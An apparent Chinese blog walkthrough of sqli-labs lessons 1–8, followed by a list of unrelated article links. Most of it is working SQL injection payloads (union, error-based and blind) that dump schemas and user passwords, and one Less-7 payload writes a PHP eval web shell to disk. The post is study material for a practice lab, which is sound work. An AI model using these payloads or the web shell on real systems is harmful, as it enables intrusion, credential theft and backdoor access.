这是抄袭你们  铃兰师姐总结的,尽管她很不情愿。

(现在只是第八关,相信她会努力的,一定会做完,我也会随时在这个上面更新的,这个是在本地搭建的,想要这个的可以找你们铃兰师姐要啊!!!)

less-1:

1、获取当前数据库名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+

SELECT * FROM users WHERE id='' union select 1,2,(select database())-- ' LIMIT 0,1

Your Login name:2

Your Password:security

当前数据库名:security

2、获取所有数据库名

?id=' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)--+

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)-- ' LIMIT 0,1

Your Login name:2

Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

所有数据库名:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

3、获取表名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)--+

//0x7365637572697479  为数据库名(security)的16进制形式

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)-- ' LIMIT 0,1

Your Login name:2

Your Password:emails,referers,uagents,users

数据库security中的表名:emails,referers,uagents,users

4、获取列名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)--+

//0x7573657273 表名:users

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =0x7365637572697479 and table_name=0x7573657273)-- ' LIMIT 0,1

Your Login name:2

Your Password:id,username,password

列名:id,username,password

5、获取数据

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

//0X7c:空格

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- ' LIMIT 0,1

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

数据:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

6、读取数据库路径/获取安装路径

http://localhost/sqli-labs-master/less-1/?id=0' union select 1,@@datadir,@@basedir--+

Your Login name:D:\wamp\bin\mysql\mysql5.6.12\data\

Your Password:D:/wamp/bin/mysql/mysql5.6.12

数据库路径:D:\wamp\bin\mysql\mysql5.6.12\data\

mysql安装路径:D:/wamp/bin/mysql/mysql5.6.12

Less-2:

1、获取列数:

http://localhost/sqli-labs-master/less-2/?id=1 order by 1,2,3,4--+

SELECT * FROM users WHERE id=1 order by 1,2,3,4-- LIMIT 0,1

Unknown column '4' in 'order clause'

(共有三列)

2、获取数据库名称:

http://localhost/sqli-labs-master/less-2/?id=' ' union select  1,2,(select database())--+

("id="后面为两个单引号)

SELECT * FROM users WHERE id=' ' union select 1,2,(select database())-- LIMIT 0,1

Your Login name:2

Your Password:security

数据库:security

3、获取所有数据库名称:

http://localhost/sqli-labs-master/less-2/?id=' '

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)-- LIMIT 0,1

Your Login name:2 Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

所有数据库名称:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

4、获取表名称:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479)-- LIMIT 0,1

Your Login name:2

Your Password:emails,referers,uagents,users

表0x7365637572697479(security)中的表有:emails,referers,uagents,users

5、获取列名称:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273)-- LIMIT 0,1

Your Login name:2

Your Password:id,username,password

数据库security中表users的列名称:id,username,password

6、获取表中数据:

http://localhost/sqli-labs-master/less-2/?id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- LIMIT 0,1

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

Less-3

1.获取列数:

http://localhost/sqli-labs-master/less-3/?id=1') order by 1,2,3,4--+

SELECT * FROM users WHERE id=('1') order by 1,2,3,4-- ') LIMIT 0,1

Unknown column '4' in 'order clause'

2.@@datadir 读取数据库路径;@@basedir  获取mysql安装路径

http://localhost/sqli-labs-master/less-3/?id=0%27)%20union%20select%201,@@datadir,@@basedir--+

之后方法类似less-1和less-2!!!

Less-4

1、获取列数:

http://localhost/sqli-labs-master/less-4/?id=1") order by 1,2,3,4--+

SELECT * FROM users WHERE id=("1") order by 1,2,3,4-- ") LIMIT 0,1

Unknown column '4' in 'order clause'

2、获取数据库名称:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%20%201,2,(select%20database())--+

3、所有数据库名称:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(schema_name)from%20information_schema.schemata)--+

4、获取表名称:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

5、获取列名:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

6、获取数据

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(id,0x7c,username,0x7c,password)%20from%20security.users)--+

Less-5:(二分法)

1.获取列数:

http://localhost/sqli-labs-master/less-5/?id=' order by 4--+

共四列: Unknown column '4' in 'order clause'

2、报错得到数据库的个数:

http://localhost/sqli-labs-master/less-5/?id=1'+and(select 1 from (select count(*),concat((select(select(select concat(0x7e7e3a7e7e,count(distinct table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

Duplicate entry '~~:~~11~~:~~1' for key 'group_key'

==>>共十一个数据库

2.报错得到数据库名:

http://localhost/sqli-labs-master/less-5/

?id=1' and (select 1 from (select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e,table_schema,0x7e7e3a7e7e) from information_schema.tables limit 8,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a)--+

Duplicate entry '~~:~~security~~:~~1' for key 'group_key'

==>第九个数据库名为 security

3.报错得到表名:

首先得到表的个数:

/less-5/?id=1' and (select 1 from (select count(*),concat((select (select(select concat(0x7e7e3a7e7e,count(table_name),0x7e7e3a7e7e)from information_schema.tables where table_schema=0x7365637572697479))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

==>Duplicate entry '~~:~~4~~:~~1' for key 'group_key'

共有四个表

依次得到表的名字:

?id=1' and (select 1 from (select count(*),concat((select(select(select concat (0x7e7e3a7e7e,table_name,0x7e7e3a7e7e)from information_schema.tables  where table_schema=0x7365637572697479 limit 3,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

Duplicate entry '~~:~~users~~:~~1' for key 'group_key'

2.获取数据库版本号:

http://localhost/sqli-labs-master/less-5/?id=1' and left(version(),1)=5--+

left(string,n)函数:提取字符串string左边的n个字符。

3.利用length()获取数据库长度:

http://localhost/sqli-labs-master/less-5/?id=1' and length(database())=8 --+

数据名长度为8;

4.奇怪:

http://localhost/sqli-labs-master/less-5/?id=1' and length(db())=8 --+

结果:FUNCTION security.db does not exist

5.获取数据库名字:使用二分法获取其各个字母

http://localhost/sqli-labs-master/less-5/?id=1' and left(database(),1) >'s'--+

第一个字母为s;

http://localhost/sqli-labs-master/less-5/?id=1%27%20and%20left(database(),2)%20%3E%27se%27--+

前两个字母为se;

依次类推。。。

6.获取数据库security 数据库的第一表的第一个字符:

首先得出数据库的第一个表的长度:

http://localhost/sqli-labs-master//Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+

长度为6;

/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables  where table_schema=database() limit 0,1),1,1))>101--+

/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables  where table_schema='security' limit 0,1),1,1))>101--+

第一个字母为e;

/Less-5/?id=1' and length(select table_name from information_schema.tables where table_schema =database() limit 0,1)>10--+

Less-7 :

1.创建一个木马文件7.php,连接菜刀(必须知道数据库的用户名和密码),然后管理数据库即可得到数据库内容

http://localhost/sqli-labs-master/less-7/?id=0%27))%20union%20select%201,2,%27%3C?php%20@eval($_POST[%27mima%27]);%20?%3E%27%20into%20outfile%20%27D://Demo//sqli-labs-master/less-7/7.php%27--+

less-8:

盲注需要掌握一些MySQL的相关函数:

length(str):返回str字符串的长度。

substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始

mid(str,pos,len):跟上面的一样,截取字符串

ascii(str):返回字符串str的最左面字符的ASCII代码值。

ord(str):同上,返回ascii码

if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0

首先要记得常见的ASCII,A:65,Z:90 a:97,z:122,  0:48, 9:57

首先select database()查询数据库

ascii(substr((select database()),1,1)):返回数据库名称的第一个字母,转化为ascii码

ascii(substr((select database()),1,1))>64:ascii大于64就返回true,if就返回1,否则返回0

ps:(你们铃兰师姐会持续更新的)

sqli-libs的更多相关文章

  1. sqli篇-本着就了解安全本质的想法,尽可能的用通俗易懂的语言去解释安全漏洞问题

    前言 最早接触安全也是从xss攻击和sql注入攻击开始的. 和xss一样屡居OWASPtop10 前三名的漏洞,sqli(sql Injection)sql注入攻击也是web安全中影响较大和影响范围较 ...

  2. 编译gtk+程序报错gcc: pkg-config --cflags --libs gtk+-2.0: 没有那个文件或目录

    第一次接触gtk+.在网上搜罗良一番,装好相应的库后,编写了第一hello程序.在编译时输入以下命令:gcc -o hello hello.c 'pkg-config --cflags --libs ...

  3. Play libs

    The play.libs package contains several useful libraries that will help you to achieve common program ...

  4. Android中libs目录下armeabi和armeabi-v7a的区别

    armeabi默认选项,支持基于 ARM* v5TE 的设备支持软浮点运算(不支持硬件辅助的浮点计算)支持所有 ARM* 设备 armeabi-v7a支持基于 ARM* v7 的设备支持硬件 FPU ...

  5. SQLi filter evasion cheat sheet (MySQL)

    This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 y ...

  6. python INFO: Can't locate Tcl/Tk libs and/or headers

    安装opencv的时候遇到这个错误: python INFO: Can't locate Tcl/Tk libs and/or headers 参考如下文章解决这个问题: http://www.ver ...

  7. 如何为libs目录下的jar包关联源代码

    以前,我们可以为lib目录下的jar包关联源代码,但是现在似乎不行了. 下面是一篇讲述此问题解决方法的文章: How to attach javadoc or sources to jars in l ...

  8. Makefile选项CFLAGS,LDFLAGS,LIBS

    CFLAGS 表示用于 C 编译器的选项, CXXFLAGS 表示用于 C++ 编译器的选项.这两个变量实际上涵盖了编译和汇编两个步骤. CFLAGS: 指定头文件(.h文件)的路径,如:CFLAGS ...

  9. Android studio libs目录

    Android studio libs目录: 关于Android studio libs目录,Android studio 已经为我们自动生成了,如果默认 是看不到默认Libs目录的,点击红色按钮地方 ...

  10. 写你自己 android 多通道打包工具 可以包libs和.so文件

    android上传应用程序,需要区分各个信道. 通常更改配置文件中的一个通道id,假设有多个通道,手动更改并生成apk这将是非常麻烦的,及增加误差的概率. 在这个课堂上分享一个打包工具.也可在网上类似 ...

随机推荐

  1. 近期面试总结(PHP后端开发工程师)(部分笔试题)

    1.字符串"0"在PHP和js中转换为布尔值是false还是true php:false; php 弱语言 '0'和0一样: js:true:字符串除了空字符串('')其他都是tr ...

  2. 详解变量声明加 var 和不加 var 的区别

    在全局作用域中声明变量加 var 关键字和不加 var ,js 引擎都会将这个变量声明为全局变量,在实际运行时,两种声明方式的变量的行为也是几乎一致的.但是在全局作用域下是否声明一个变量的 时候加va ...

  3. HTML笔记<note1>

    <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" ...

  4. 【ASP.NET MVC 学习笔记】- 04 依赖注入(DI)

    本文参考:http://www.cnblogs.com/willick/p/3223042.html 1.在一个类内部,不通过创建对象的实例而能够获得某个实现了公开接口的对象的引用.这种"需 ...

  5. web项目生成war包的问题

    今天面试一家公司,问我生成war包的命令是什么? 当时没明白,就说自己用的eclipse直接右键 export --->war 完了重启tomcat(第一种) 好久没用maven了.回来一查才明 ...

  6. .9-Vue源码之AST(5)

    上节跑完了超长的parse函数: // Line-9261 function baseCompile(template, options) { // Done! var ast = parse(tem ...

  7. JS实现移动端购物车左滑删除功能

    <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name ...

  8. spark在yarn-cluster模式,错误查找方法

    yarn logs -applicationId application_xxxx_xxx 可选(">exception")

  9. Knight Moves

    Problem Description A friend of you is doing research on the Traveling Knight Problem (TKP) where yo ...

  10. Lifting the Stone(求多边形的重心—)

    Lifting the Stone Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 65536/32768 K (Java/Others) T ...